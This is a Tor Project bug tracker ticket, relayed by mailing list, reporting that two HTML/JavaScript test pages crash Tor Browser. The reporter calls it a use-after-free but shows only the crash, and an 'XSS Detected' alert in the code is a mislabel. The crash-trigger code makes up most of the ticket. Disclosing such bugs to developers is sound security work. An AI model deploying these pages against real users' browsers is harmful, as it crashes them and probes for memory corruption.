#26705: BUG Report ! Use after Free Vulnerability
------------------------------+------------------------------
     Reporter:  t4rkd3vilz    |      Owner:  (none)
         Type:  project       |     Status:  new
     Priority:  Very High     |  Milestone:
    Component:  Core Tor/Tor  |    Version:  Tor: unspecified
     Severity:  Normal        |   Keywords:
Actual Points:                |  Parent ID:
       Points:                |   Reviewer:
      Sponsor:                |
------------------------------+------------------------------
hello,
In Tor Browser, click New Tab. In the new tab, open HTML with this code:

    <style>
    body { display: table }
    </style>
    <script>
    function freenabo() {
      /* fuzzPriv.forceGC() exists only when Mozilla's fuzzing-privileges
         extension is installed; in a stock Tor Browser the call throws a
         ReferenceError and the catch block runs instead */
      try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); }
    }
    function go() {
      var s = document.getSelection();
      window.find("1", true, false, true, false);
      s.modify("extend", "forward", "line");
      document.body.append(document.createElement("table"));
      freenabo()
    }
    </script>
    <body onload=go()>
    <table>
    <th>t4rkd3vilz</th>
    </table>
    <progress></progress>

Then open a second tab. The second tab's code:

    <!DOCTYPE html>
    <html>
    <title>veryhandsome jameel naboo</title>
    <body>
    <script>
    function send() {
      try { document.body.contentEditable = 'true'; } catch(e){}
      try { var e0 = document.createElement("frameset"); } catch(e){}
      try { document.body.appendChild(e0); } catch(e){}
      try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
      /* DOMAttrModified is a (deprecated) mutation event fired when an
         attribute of e0 changes */
      try {
        e0.addEventListener("DOMAttrModified", function(){
          document.execCommand("SelectAll");
          e0['border'] = '-4400000000';
        }, false);
        e0.focus();
      } catch(e){}
      /* setAttribute() and insertBefore() are each called with a missing
         argument and throw a TypeError, which the try/catch swallows */
      try { e0.setAttribute('iframe'); } catch(e){}
      try { document.body.insertBefore(e0); } catch(e){}
    }
    send();
    </script>
    </html>

Result: Tor Browser crashes.

--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/26705>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online
_______________________________________________
tor-bugs mailing list
tor-bugs@lists.torproject.org
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-bugs